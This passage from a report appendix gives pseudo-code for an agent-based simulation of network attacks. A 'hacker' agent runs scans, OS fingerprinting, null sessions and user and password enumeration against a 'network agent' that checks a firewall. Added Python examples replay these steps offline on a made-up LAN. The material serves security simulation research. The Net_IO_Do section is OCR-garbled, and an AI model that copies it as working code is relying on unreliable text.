    Log.C = "Intermediate_State_SPIH1";
    Log.Type = 0;

  Do action (SPIH_SPIH1_Do):
    Step.xState = "SPIH1";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "STIH" -> STIH
    Step.yState = "SSIH" -> SSIH

  Exit action: none
Script of the agent “Hacker” behaviour in the state STIH of the state machine SPIH

  Entry action (SPIH_STIH_Entry):
    dC = 0.9;
    Log.Create();
    Log.A = "SPIH";
    Log.S = "STIH";
    Log.Description = "TCP connect scan";
    Log.DebugInfo = "A => R => IH => SPIH => STIH";
    Log.ResultComment = "IP-addresses";
    Log.C = "Terminal_State_2";
    Log.Type = 1;
    CALLSCRIPT( ip_address );

  Do action (SPIH_STIH_Do):
    Step.xState = "STIH";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "STIH"  -> STIH
    Step.yState = "SPIH2" -> SPIH2

  Exit action: none

Script of the agent “Hacker” behaviour in the state SSIH of the state machine SPIH

  Entry action (SPIH_SSIH_Entry):
    dC = 0.9;
    Log.Create();
    Log.A = "SPIH";
    Log.S = "SSIH";
    Log.Description = "TCP SYN scan";
    Log.DebugInfo = "A => R => IH => SPIH => SSIH";
    Log.ResultComment = "IP-addresses";
    Log.C = "Terminal_State_3";
    Log.Type = 1;
    CALLSCRIPT( ip_address );

  Do action (SPIH_SSIH_Do):
    Step.xState = "SSIH";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "SSIH"  -> SSIH
    Step.yState = "SPIH2" -> SPIH2

  Exit action: none


Script of the agent “Hacker” behaviour in the state SPIH2 of the state machine SPIH

  Entry action (SPIH_SPIH2_Entry):
    Log.Create();
    Log.A = "SPIH";
    Log.S = "SPIH2";
    Log.DebugInfo = "A => R => IH => SPIH => SPIH2";
    Log.C = "Intermediate_State_SPIH2";
    Log.Type = 0;

  Do action (SPIH_SPIH2_Do):
    Step.xState = "SPIH2";
    Step.Condition = 0;
    CALLSCRIPT( Do_script );

  Transitions (condition -> next state):
    Step.yState = "SPIH1" -> SPIH1
    Step.yState = "End"   -> End

  Exit action: none
VI. Communicational state machine IH_MSG

1. Identifier of the node to which the state machine corresponds: (1)

2. State machine diagram.

3. Main parameters of the state machine.

  State machine name:                      IH_MSG
  Relevant intentions:                     1,2,3,4,5,6,7,8,9,10,11,12
  States:                                  Init, IH_MSG_Proc, End
  First state:                             Init
  Nonterminal states:                      -
  Terminal states:                         -
  Auxiliary (communicational) states:      IH_MSG_Proc

4. Parameters of transitions.

Columns as in the tables above (N, CS, script name, NS, Cond, intentions 1..12); the transitions of this machine are not probabilistic, so the intention columns are empty.

 N | CS          | Script name     | NS          | Cond
 0 | Init        | MSG_Init_Do     | IH_MSG_Proc |  -
 1 | IH_MSG_Proc | IH_MSG_Proc_Do  | IH_MSG_Proc |  -
 2 | IH_MSG_Proc |                 | End         |  -
5.  Transition  conditions.  Absent. 


6. Scripts.

Script of the agent “Hacker” behaviour in the state Init of the state machine IH_MSG

  Entry action: none

  Do action (MSG_Init_Do):
    MESSAGE( Attack, AttackTemplate, ReplyWith = "recon" );

  Transitions (condition -> next state):
    -> IH_MSG_Proc

  Exit action: none

Script of the agent “Hacker” behaviour in the state IH_MSG_Proc of the state machine IH_MSG

  Entry action: none

  Do action (IH_MSG_Proc_Do):
    IF ( newAttack.Exist() ) THEN
      REPEAT
        IF ( newAttack.ip != "" ) THEN
          IF ( NOT Host.Exist( Host.IP = newAttack.ip ) ) THEN
            Host.Create(); Host.IP = newAttack.ip;
          ENDIF;
          LogResult.Create(); LogResult.ID = Log.ID; LogResult.Result = Host.IP;
        ENDIF;
      UNTIL ( newAttack.Next() );
    ENDIF;
    LastMessage.Create(); LastMessage.Auto = IDAuto; LastMessage.Msg = MSGNumber;

  Transitions (condition -> next state):
    ( Dialog != 0 ) AND NewMessageFind -> IH_MSG_Proc
    ( Dialog = 0 )                     -> End

  Exit action: none
Appendix 2. Examples of the scripts of the Network Agent operation

Script of the “Network agent” behaviour in the state Init of the state machine N

  Entry action: none

  Do action (N_Start_Do):
    str = ""; bX = FALSE;
    CALLSCRIPT( Attack_Erase_Do );
    IsFirewalled( newAttack.Name, newAttack.ip, newAttack.HackerIP, newAttack.IsNet, bX, str );
    IF ( bX ) THEN
      Attack.IsNet = newAttack.IsNet;
      Attack.Name = newAttack.Name;
      Attack.SubClass0 = newAttack.SubClass0;
      Attack.SubClass1 = newAttack.SubClass1;
      Attack.ip = newAttack.ip; Attack.FailMessage = str;
      MESSAGE( Attack, ReplyTemplate, InReplyWith = InMSG.ReplyWith );
    ENDIF;
    bZ = bX;

  Transitions (condition -> next state):
    newAttack.SubClass0 = "IH" AND NOT bZ                                  -> IH
    newAttack.SubClass1 = "SPIS" AND NOT bZ                                -> SPIS
    newAttack.SubClass0 = "IO" AND NOT bZ                                  -> IO
    newAttack.SubClass0 = "RE" AND newAttack.Name != "SRE" AND NOT bZ      -> RE
    ( newAttack.SubClass1 = "ENS" OR newAttack.Name = "SRE" ) AND NOT bZ   -> ENS
    newAttack.SubClass0 = "UE" AND NOT bZ                                  -> UE
    newAttack.SubClass0 = "ABE" AND NOT bZ                                 -> ABE
    newAttack.SubClass0 = "GAR" AND NOT bZ                                 -> GAR
    newAttack.SubClass0 = "CI" AND NOT bZ                                  -> CI
    newAttack.SubClass0 = "EP" AND NOT bZ                                  -> EP
    newAttack.SubClass0 = "GAD" AND NOT bZ                                 -> GAD
    newAttack.SubClass1 = "CVR" AND NOT bZ                                 -> CVR
    newAttack.SubClass1 = "IVR" AND NOT bZ                                 -> IVR
    newAttack.SubClass0 = "CT" AND NOT bZ                                  -> CT
    newAttack.SubClass0 = "CBD" AND NOT bZ                                 -> CBD
    bZ                                                                     -> End

  Exit action: none

The parameter bZ is a logical variable that takes (through bX) the value returned by the function IsFirewalled(...). If that value is TRUE, the hacker's attack is blocked by the firewall: the network agent reports the failure to the hacker agent and the state machine makes a transition into the terminal state End and finishes. In that case the state machine is initialized again by the next incoming message from the hacker agent ( newAttack.Exist() ).


Common script for querying the firewall and generating the reply in the case of an attack against a single host

  Entry action: none

  Do action (Check_Firewall_Do):
    str = ""; bX = FALSE; dC = 0;
    CALLSCRIPT( Attack_Erase_Do );
    IsFirewalled( newAttack.Name, newAttack.ip, newAttack.HackerIP, dC, bX, str );
    IF ( bX ) THEN
      Attack.IsNet = newAttack.IsNet; Attack.Name = newAttack.Name;
      Attack.SubClass0 = newAttack.SubClass0; Attack.SubClass1 = newAttack.SubClass1;
      Attack.ip = Host.IP; Attack.FailMessage = str;
      MESSAGE( Attack, ReplyTemplate, InReplyWith = InMSG.ReplyWith );
    ENDIF;
    bZ = bX;

  Transitions: none

  Exit action: none

Common script for querying the firewall and generating the reply in the case of an attack against a network

  Entry action: none

  Do action (Check_Firewall_Do2):
    str = ""; bX = FALSE; dC = 0;
    CALLSCRIPT( Attack_Erase_Do );
    IsFirewalled( newAttack.Name, newAttack.ip, newAttack.HackerIP, dC, bX, str );
    IF ( bX ) THEN
      Attack.IsNet = newAttack.IsNet;
      Attack.Name = newAttack.Name;
      Attack.SubClass0 = newAttack.SubClass0;
      Attack.SubClass1 = newAttack.SubClass1;
      Attack.ip = Host.IP; Attack.FailMessage = str;
      MESSAGE( Attack, InformTemplate, InReplyWith = InMSG.ReplyWith );
    ENDIF;
    bZ = bX;

  Transitions: none

  Exit action: none

Common script for outgoing message cleaning

  Entry action: none

  Do action (Attack_Erase_Do):
    bZ = FALSE;
    Attack.Name = ""; Attack.ip = ""; Attack.Class = ""; Attack.IsNet = 0; Attack.Port = "";
    Attack.SubClass0 = ""; Attack.SubClass1 = ""; Attack.SubClass2 = "";
    Attack.OSplatform = ""; Attack.OStype = ""; Attack.OSversion = "";
    Attack.Message = ""; Attack.SharedRes = ""; Attack.DomLink = "";
    Attack.DomainControl = ""; Attack.DomainName = ""; Attack.UserID = "";
    Attack.UserSID = ""; Attack.UserPsw = ""; Attack.Appl = ""; Attack.DNS1HostName = "";
    Attack.DNS2Post = ""; Attack.SysTime = ""; Attack.Mask = ""; Attack.DNS2DomName = "";
    Attack.DNS1HostIP = ""; Attack.TrusHost = ""; Attack.FailMessage = "";

  Transitions: none

  Exit action: none


Script of the “Network agent” behaviour in the state IH of the state machine N

  Entry action: none

  Do action:
    IF ( newAttack.IsNet = 0 ) THEN
      IF ( Host.Exist( Host.IP = newAttack.ip ) ) THEN
        CALLSCRIPT( Check_Firewall_Do );
        IF ( bZ ) THEN RETURN(); ENDIF;
        AttRandom( newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX );
        IF ( bX ) THEN
          Attack.IsNet = newAttack.IsNet; Attack.Name = newAttack.Name;
          Attack.SubClass0 = newAttack.SubClass0; Attack.ip = Host.IP;
        ENDIF;
        MESSAGE( Attack, ReplyTemplate, InReplyWith = InMSG.ReplyWith );
        RETURN();
      ENDIF;
    ENDIF;
    IF ( newAttack.IsNet = 1 ) THEN
      IF ( LAN.Exist( LAN.IP = newAttack.ip ) ) THEN
        REPEAT
          IF ( Host.Exist( Host.IP != "" ) ) THEN
            CALLSCRIPT( Check_Firewall_Do2 );
            IF ( NOT bZ ) THEN
              AttRandom( newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX );
              IF ( bX ) THEN
                Attack.IsNet = newAttack.IsNet;
                Attack.Name = newAttack.Name;
                Attack.SubClass0 = newAttack.SubClass0;
                Attack.ip = Host.IP;
              ENDIF;
              MESSAGE( Attack, InformTemplate, InReplyWith = InMSG.ReplyWith );
            ENDIF;
          ENDIF;
        UNTIL ( Host.Next() );
        MESSAGE( 0, ReplyTemplate, InReplyWith = InMSG.ReplyWith );
        RETURN();
      ENDIF;
    ENDIF;

  Transitions (condition -> next state):
    -> End

  Exit action: none
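The Init, Check_Firewall_Do2 and IH scripts of the network agent, together with the IH_MSG scripts of the hacker agent in Section VI, describe one request/reply dialog. As an added example that is not part of the report, the Python below plays both sides of that dialog for a network-wide ping sweep (IsNet = 1): the hacker sends the AttackTemplate message, the network agent answers with one InformTemplate per host (a FailMessage for a firewalled host, the host's IP when AttRandom succeeds, an empty ip otherwise) and a closing ReplyTemplate, and the hacker's IH_MSG_Proc_Do fills its Host table. The LAN, the firewall policy, the attack name "NPS" and all function names are constructed for this example; IsFirewalled and AttRandom are replaced by simple stand-ins.

```python
import random
from dataclasses import dataclass


@dataclass
class Attack:
    """The Attack record the two agents exchange (field names as on the page)."""
    Name: str = ""
    SubClass0: str = ""
    ip: str = ""
    IsNet: int = 0
    HackerIP: str = ""
    FailMessage: str = ""


@dataclass
class Message:
    """MESSAGE(content, template, ReplyWith / InReplyWith)."""
    content: object
    template: str
    reply_with: str = ""
    in_reply_with: str = ""


# Constructed network model (assumption, not from the report): one LAN and a
# firewall policy keyed by (attack name, host ip) -> denial message.
LAN = {"10.0.0.0": ["10.0.0.1", "10.0.0.2", "10.0.0.3"]}
FIREWALL = {("NPS", "10.0.0.2"): "ICMP echo blocked by firewall"}


def is_firewalled(name, ip, hacker_ip):
    """Stand-in for IsFirewalled(...): returns (bX, str)."""
    msg = FIREWALL.get((name, ip), "")
    return bool(msg), msg


def att_random(rng, p):
    """Stand-in for AttRandom(dC, bX): the action succeeds with probability p."""
    return rng.random() < p


def hacker_request(hacker_ip, target_net):
    """MSG_Init_Do: MESSAGE(Attack, AttackTemplate, ReplyWith="recon")."""
    attack = Attack("NPS", "IH", target_net, 1, hacker_ip)  # "NPS" is a constructed name
    return Message(attack, "AttackTemplate", reply_with="recon")


def network_agent_ih(request, rng, p_success=1.0):
    """State IH of machine N, IsNet=1 branch: Check_Firewall_Do2 per host, one
    InformTemplate per host, then ReplyTemplate(0) to close the dialog."""
    req, out = request.content, []
    for host_ip in LAN.get(req.ip, []):
        blocked, why = is_firewalled(req.Name, host_ip, req.HackerIP)
        reply = Attack(req.Name, req.SubClass0, "", req.IsNet, req.HackerIP)
        if blocked:                       # bZ = TRUE: report the failure
            reply.ip, reply.FailMessage = host_ip, why
        elif att_random(rng, p_success):  # bX = TRUE: the host answered
            reply.ip = host_ip
        out.append(Message(reply, "InformTemplate", in_reply_with=request.reply_with))
    out.append(Message(0, "ReplyTemplate", in_reply_with=request.reply_with))
    return out


def hacker_ih_msg_proc(replies, hosts):
    """IH_MSG_Proc_Do: record every reported ip in the Host table and log it.
    Replies carrying a FailMessage are skipped (my addition; the report's
    script keys only on a non-empty ip)."""
    log_results = []
    for m in replies:
        if m.template != "InformTemplate":
            continue
        a = m.content
        if a.ip == "" or a.FailMessage:
            continue
        if a.ip not in hosts:
            hosts.append(a.ip)
        log_results.append(a.ip)
    return log_results


def run_ping_sweep(seed=1, p_success=1.0):
    """One full recon dialog; returns (hosts learned, replies received)."""
    rng = random.Random(seed)
    request = hacker_request("192.0.2.10", "10.0.0.0")
    replies = network_agent_ih(request, rng, p_success)
    hosts = []
    hacker_ih_msg_proc(replies, hosts)
    return hosts, replies


if __name__ == "__main__":
    learned, msgs = run_ping_sweep()
    print(learned)  # ['10.0.0.1', '10.0.0.3']: the firewalled host is not learned
```

Note the caveat the example encodes: as written on the page, Check_Firewall_Do2 sends the blocked host's IP in the failure reply and IH_MSG_Proc_Do adds any non-empty ip to the Host table, so a firewalled host would be counted as discovered; the example checks FailMessage first so the hacker only learns hosts that actually answered.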


Script of the “Network agent” behaviour in the state SPIS of the state machine N

  Entry action: none

  Do action (Net_SPIS_Do):
    IF ( newAttack.IsNet = 1 ) THEN
      IF ( LAN.Exist( LAN.IP = newAttack.ip ) ) THEN
        REPEAT
          IF ( Host.Exist( Host.IP != "" ) ) THEN
            DELETEALL( xAttack );
            CALLSCRIPT( Check_Firewall_Do2 );
            IF ( NOT bZ ) THEN
              bY = FALSE;
              REPEAT
                IF ( Service.Exist( Service.IP = Host.IP ) ) THEN
                  str = "";
                  AttRandom( newAttack.Name, str, newAttack.SubClass1, str, Host.IP, bX );
                  IF ( bX ) THEN
                    xAttack.Create();
                    xAttack.IsNet = 1; xAttack.Name = newAttack.Name;
                    xAttack.SubClass1 = newAttack.SubClass1;
                    xAttack.ip = Host.IP; xAttack.Port = Service.Port;
                    bY = TRUE;
                  ENDIF;
                ENDIF;
              UNTIL ( Service.Next() );
              IF ( bY ) THEN
                MESSAGE( xAttack(ALL), InformTemplate, InReplyWith = InMSG.ReplyWith );
              ENDIF;
            ENDIF;
          ENDIF;
        UNTIL ( Host.Next() );
      ENDIF;
      DELETEALL( xAttack );
      CALLSCRIPT( Attack_Erase_Do );
      MESSAGE( 0, ReplyTemplate, InReplyWith = InMSG.ReplyWith );
      RETURN();
    ENDIF;
    IF ( newAttack.IsNet = 0 ) THEN
      DELETEALL( xAttack );
      IF ( Host.Exist( Host.IP = newAttack.ip ) ) THEN
        CALLSCRIPT( Check_Firewall_Do );
        IF ( bZ ) THEN RETURN(); ENDIF;
        bY = FALSE;
        REPEAT
          IF ( Service.Exist( Service.IP = Host.IP ) ) THEN
            str = "";
            AttRandom( newAttack.Name, str, newAttack.SubClass1, str, Host.IP, bX );
            IF ( bX ) THEN
              xAttack.Create();
              xAttack.Name = newAttack.Name;
              xAttack.SubClass1 = newAttack.SubClass1;
              xAttack.ip = Host.IP; xAttack.Port = Service.Port;
              bY = TRUE;
            ENDIF;
          ENDIF;
        UNTIL ( Service.Next() );
        IF ( bY ) THEN
          MESSAGE( xAttack(ALL), InformTemplate, InReplyWith = InMSG.ReplyWith );
        ENDIF;
      ENDIF;
      MESSAGE( 0, ReplyTemplate, InReplyWith = InMSG.ReplyWith );
      RETURN();
    ENDIF;

  Transitions (condition -> next state):
    -> End

  Exit action: none


Script  of  the  “Network  agent”  behaviour  in  the  state  10  of  the  state  machine  N 


1  Entry  | 

|  Entry  action 

|  State  action  | 

Do  action 

Net_IO_Do 

IF  (newAttack.IsNet=0)  THEN 

IF  (Host.Exist  (Host.IP=newAttack.ip))  THEN 

CALLSCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

CALL  (Net  IO  Do2); 

IF  (bY)  THEN 

Attack.IsNet=newAttack.IsNet; 

Attack.Name=newAttack.Name; 

Attack.SubClassO=newAttack.SubClassO;  Attack.ip=Host.IP; 

ENDIF; 

ENDIF; 

MESSAGE  (Attack,  ReplyTemplate,  InReplyWith=InMSG.ReplyWith); 

RETURN!); 

ENDIF; 

IF  (newAttack.IsNet=l)  THEN 

IF  (  LAN.Exist  (LAN.IP=newAttack.ip)  THEN 

REPEAT 

IF  Host.Exist  (Host.IP!="")  THEN 

CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 

CALL  (Net_IO_Do2); 

IF  (bY)  THEN 

Attack.IsNet=newAttack.IsNet; 

Attack.Name=newAttack.Name; 

Attack.SubClassO=newAttack.SubClassO; 

Attack.ip=Host.IP; 

MESSAGE  ( Attack, InformTemplate,InReplyWith=InMSG. Reply  With); 
ENDIF; 

ENDIF; 

ENDIF; 

UNTIL  (Host.NextO); 

ENDIF; 

CALL  (Attack_Erase_Do); 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 

Transitions.  Condition  /  Next  state  /  Action 

End 

|  Exit  action 

Additional script of the “Network agent” behaviour in the state IO of the state machine N

Entry
  Entry action
State action
  Do action (Net_IO_Do2):
    str=""; bY=FALSE; Attack.OSplatform=""; Attack.OStype=""; Attack.OSversion="";
    AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
    IF (bX) THEN
      Attack.OSplatform=Host.OSplatform; bY=TRUE;
    ENDIF;
    AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
    IF (bX) THEN
      Attack.OStype=Host.OStype; bY=TRUE;
    ENDIF;
    AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
    IF (bX) THEN
      Attack.OSversion=Host.OSversion; bY=TRUE;
    ENDIF;


Script of the “Network agent” behaviour in the state RE of the state machine N

Entry
  Entry action
State action
  Do action:
    IF (newAttack.IsNet=0) THEN
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        CALLSCRIPT (Net_RE_Do2);
      ENDIF;
      MESSAGE (Attack, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=1) THEN
      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              CALLSCRIPT (Net_RE_Do2);
              MESSAGE (Attack, InformTemplate, InReplyWith=InMSG.ReplyWith);
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      CALLSCRIPT (Attack_Erase_Do);
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
  End
Exit action


Additional script of the “Network agent” behaviour in the state RE of the state machine N

Entry
  Entry action
State action
  Do action (Net_RE_Do2):
    str=""; Attack.Message=""; Attack.DomainControl=""; Attack.DomainName="";
    Attack.DomLink=""; Attack.SharedRes="";
    AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
    IF (bX) THEN
      IF (newAttack.Name="CNS") THEN
        Attack.Message="Null Session Connection was done successfully";
      ENDIF;
      IF (newAttack.Name="EDC") THEN
        IF (Domain.Exist(Domain.IP=Host.IP)) THEN
          Attack.DomainControl=Domain.Control;
        ENDIF;
      ENDIF;
      IF (newAttack.Name="EDNV") THEN
        IF (Domain.Exist(Domain.IP=Host.IP)) THEN
          Attack.DomainName=Domain.Name;
        ENDIF;
      ENDIF;
      IF (newAttack.Name="ERD") THEN
        IF (DomLink.Exist(DomLink.IP=Host.IP)) THEN
          Attack.DomLink=DomLink.Domain;
        ENDIF;
      ENDIF;
    ENDIF;
    Attack.IsNet=newAttack.IsNet; Attack.Name=newAttack.Name;
    Attack.SubClass0=newAttack.SubClass0; Attack.ip=Host.IP;
Transitions. Condition / Next state / Action
Exit action


Script of the “Network agent” behaviour in the state ENS of the state machine N

Entry
  Entry action
State action
  Do action (Net_ENS_Do):
    IF (newAttack.IsNet=1) THEN
      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            DELETEALL (xAttack);
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              REPEAT
                IF (SharedRes.Exist(SharedRes.IP=Host.IP)) THEN
                  str="";
                  AttRandom (newAttack.Name, str, newAttack.SubClass1, str, Host.IP, bX);
                  IF (bX) THEN
                    xAttack.Create();
                    xAttack.IsNet=1;
                    xAttack.Name=newAttack.Name; xAttack.SubClass1=newAttack.SubClass1;
                    xAttack.ip=Host.IP; xAttack.SharedRes=SharedRes.Name;
                  ENDIF;
                ENDIF;
              UNTIL (SharedRes.Next());
              MESSAGE (xAttack(ALL), InformTemplate, InReplyWith=InMSG.ReplyWith);
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      DELETEALL (xAttack);
      CALLSCRIPT (Attack_Erase_Do);
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=0) THEN
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        DELETEALL (xAttack);
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        REPEAT
          IF (SharedRes.Exist(SharedRes.IP=Host.IP)) THEN
            str="";
            AttRandom (newAttack.Name, str, newAttack.SubClass1, str, Host.IP, bX);
            IF (bX) THEN
              xAttack.Create();
              xAttack.IsNet=0;
              xAttack.Name=newAttack.Name;
              xAttack.SubClass1=newAttack.SubClass1; xAttack.ip=Host.IP;
              xAttack.SharedRes=SharedRes.Name;
            ENDIF;
          ENDIF;
        UNTIL (SharedRes.Next());
        MESSAGE (xAttack(ALL), InformTemplate, InReplyWith=InMSG.ReplyWith);
      ENDIF;
      CALLSCRIPT (Attack_Erase_Do);
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
  End
Exit action
Script of the “Network agent” behaviour in the state UE of the state machine N

Entry
  Entry action
State action
  Do action (Net_UE_Do):
    IF (newAttack.Name="UTFTP") THEN
      CALLSCRIPT (Net_UE_UTFTP_Do);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=1) THEN
      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              REPEAT
                IF (User.Exist(User.IP=Host.IP)) THEN
                  DELETEALL (xAttack);
                  CALLSCRIPT (Net_UE_Do2);
                  MESSAGE (xAttack(ALL), InformTemplate, InReplyWith=InMSG.ReplyWith);
                ENDIF;
              UNTIL (User.Next());
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      DELETEALL (xAttack);
      CALLSCRIPT (Attack_Erase_Do);
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=0) THEN
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        REPEAT
          IF (User.Exist(User.IP=Host.IP)) THEN
            DELETEALL (xAttack);
            CALLSCRIPT (Net_UE_Do2);
            MESSAGE (xAttack(ALL), InformTemplate, InReplyWith=InMSG.ReplyWith);
          ENDIF;
        UNTIL (User.Next());
      ENDIF;
      DELETEALL (xAttack);
      CALLSCRIPT (Attack_Erase_Do);
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
  End
Exit action


Additional script of the “Network agent” behaviour in the state UE of the state machine N

Entry
  Entry action
State action
  Do action (Net_UE_Do2):
    str=""; dC=0;
    AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
    IF (bX) THEN
      IF (User.ID!="") THEN (dC=1); ENDIF;
    ENDIF;
    AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
    IF ((bX) AND (dC=1)) THEN
      IF (User.Psw!="") THEN (dC=2); ENDIF;
    ENDIF;
    IF (newAttack.Name="ISU") THEN
      AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
      IF (bX) THEN
        IF (User.SID!="") THEN
          IF (dC=1) THEN (dC=3); ENDIF;
          IF (dC=2) THEN (dC=4); ENDIF;
        ENDIF;
      ENDIF;
    ENDIF;
    IF (dC=1) THEN
      xAttack.Create(); xAttack.IsNet=newAttack.IsNet; xAttack.Name=newAttack.Name;
      xAttack.SubClass1=newAttack.SubClass1; xAttack.ip=Host.IP;
      xAttack.UserID=User.ID;
    ENDIF;
    IF (dC=2) THEN
      xAttack.Create(); xAttack.IsNet=newAttack.IsNet; xAttack.Name=newAttack.Name;
      xAttack.SubClass1=newAttack.SubClass1; xAttack.ip=Host.IP;
      xAttack.UserPsw=User.Psw; xAttack.UserID=User.ID;
    ENDIF;
    IF (dC=3) THEN
      xAttack.Create(); xAttack.IsNet=newAttack.IsNet; xAttack.Name=newAttack.Name;
      xAttack.SubClass1=newAttack.SubClass1; xAttack.ip=Host.IP;
      xAttack.UserID=User.ID; xAttack.UserSID=User.SID;
    ENDIF;
    IF (dC=4) THEN
      xAttack.Create(); xAttack.IsNet=newAttack.IsNet; xAttack.Name=newAttack.Name;
      xAttack.SubClass1=newAttack.SubClass1; xAttack.ip=Host.IP;
      xAttack.UserPsw=User.Psw; xAttack.UserID=User.ID; xAttack.UserSID=User.SID;
    ENDIF;
Transitions. Condition / Next state / Action
Exit action
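The dispatch pattern shared by the Net_*_Do scripts above (IsNet=0 targets one host, IsNet=1 sweeps a LAN, each host gated by the Check_Firewall_Do flag bZ) together with the dC counter of Net_UE_Do2, written out as a runnable Python model. This is an added example, not code from the report; the dataclasses, the success probability `p` standing in for AttRandom, the dict records standing in for xAttack, and the sample LAN are assumptions made here so that the simulated Inform/Reply messages can be inspected offline.

```python
"""Added example (not the report's code): a Python model of the "Network
agent" dispatch pattern shared by the Net_*_Do scripts, instantiated with
the Net_UE_Do2 user-enumeration sub-script.

Assumptions: Host, User, LAN, bZ (Check_Firewall_Do) and AttRandom are the
report's identifiers; the dataclasses, the success probability `p`, the
sample network and the dict records are constructed for this example.
"""
import random
from dataclasses import dataclass, field


@dataclass
class User:                      # stands in for the report's User entity
    id: str = ""
    psw: str = ""
    sid: str = ""


@dataclass
class Host:                      # stands in for the report's Host entity
    ip: str
    lan: str                     # LAN.IP this host belongs to
    firewalled: bool = False     # bZ as set by Check_Firewall_Do / _Do2
    users: list = field(default_factory=list)


def att_random(rng, p):
    """Stands in for AttRandom: bX=TRUE when the simulated step succeeds."""
    return rng.random() < p


def net_ue_do2(host, user, name, rng, p=1.0):
    """Net_UE_Do2: the dC counter records which user attributes the
    simulated enumeration exposed; returns the xAttack record as a dict,
    or None when dC stays 0 and no record is created."""
    dc = 0
    if att_random(rng, p) and user.id != "":          # first AttRandom
        dc = 1
    if att_random(rng, p) and dc == 1 and user.psw != "":   # second
        dc = 2
    if name == "ISU" and att_random(rng, p) and user.sid != "":
        dc = {1: 3, 2: 4}.get(dc, dc)   # dC=1 -> 3, dC=2 -> 4, else unchanged
    if dc == 0:
        return None
    rec = {"Name": name, "ip": host.ip, "UserID": user.id}
    if dc in (2, 4):
        rec["UserPsw"] = user.psw
    if dc in (3, 4):
        rec["UserSID"] = user.sid
    return rec


def net_ue_do(new_attack, hosts, rng=None, p=1.0):
    """Net_UE_Do: IsNet=0 targets the single host newAttack.ip, IsNet=1
    sweeps every host of LAN newAttack.ip.  Returns (inform_records, reply):
    inform_records are the InformTemplate messages, reply is the
    ReplyTemplate message, or None when a firewalled single host makes the
    script RETURN () before any reply is sent."""
    rng = rng or random.Random(0)
    informs = []
    if new_attack["IsNet"] == 0:
        targets = [h for h in hosts if h.ip == new_attack["ip"]]
    else:
        targets = [h for h in hosts if h.lan == new_attack["ip"]]
    for host in targets:
        if host.firewalled:
            if new_attack["IsNet"] == 0:
                return informs, None        # IF (bZ) THEN RETURN ();
            continue                        # LAN sweep: IF (NOT bZ) guard
        for user in host.users:             # REPEAT ... UNTIL (User.Next())
            rec = net_ue_do2(host, user, new_attack["Name"], rng, p)
            if rec is not None:
                informs.append(rec)
    return informs, "ReplyTemplate"


def sample_network():
    """Constructed sample LAN 10.0.0.0 (not from the report)."""
    return [
        Host("10.0.0.5", "10.0.0.0", users=[
            User("alice", "s3cret", "S-1-5-21-1"), User("guest")]),
        Host("10.0.0.7", "10.0.0.0", firewalled=True,
             users=[User("bob", "pw", "S-1-5-21-2")]),
        Host("10.0.0.9", "10.0.0.0", users=[User("carol", "", "S-1-5-21-3")]),
    ]


if __name__ == "__main__":
    recs, reply = net_ue_do({"IsNet": 1, "ip": "10.0.0.0", "Name": "ISU"},
                            sample_network())
    for r in recs:
        print(r)
    print("reply:", reply)
```

With p=1.0 every AttRandom succeeds, so the records show exactly which attributes each user entry would leak; lowering p reproduces the report's probabilistic outcome.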
Additional script of the “Network agent” behaviour in the state UE of the state machine N (UTFTP attack)

Entry
  Entry action
State action
  Do action (Net_UE_UTFTP_Do):
    IF (newAttack.IsNet=1) THEN
